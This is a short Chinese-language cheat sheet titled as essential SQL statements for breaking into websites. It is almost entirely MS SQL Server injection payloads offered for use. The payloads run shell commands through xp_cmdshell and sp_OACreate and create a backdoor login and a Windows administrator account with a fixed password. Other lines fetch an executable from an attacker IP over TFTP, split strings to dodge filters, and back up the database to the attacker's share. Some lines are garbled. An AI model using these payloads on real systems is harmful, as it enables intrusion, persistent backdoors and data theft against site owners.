入侵网站必备Sql语句:(经典语句)

核心提示： table cmd (str image);-- 建立image类型的表cmd存在xp_cmdshell的测试过程：;exec master..xp_cmdshell dir;execmaster.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号;execmaste

table cmd (str image);-- 建立image类型的表cmd

存在xp_cmdshell的测试过程：

;exec master..xp_cmdshell dir
;exec
master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
;exec
master.dbo.sp_password null,jiaoniang$,1866574;--
;exec
master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec
master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:*
/times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec
master.dbo.xp_cmdshell net localgroup administrators jiaoniang$
/add;--
exec master..xp _servicecontrol start, schedule

启动服务

exec master..xp_servicecontrol start, server
;
DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC
SP_OAMETHOD @shell,run,null, C：WINNTsystem32cmd.exe /c net user
jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_OACREATE
wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,
C：WINNTsystem32cmd.exe /c net localgroup administrators jiaoniang$ /add

;

exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件

;declare @a sysname set @a=xp_+cmdshell exec @a dir c:
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:
;declare @a;set @a=db_name();backup database @a to

disk=你的IP你的共享目录bak.dat

如果被限制则可以。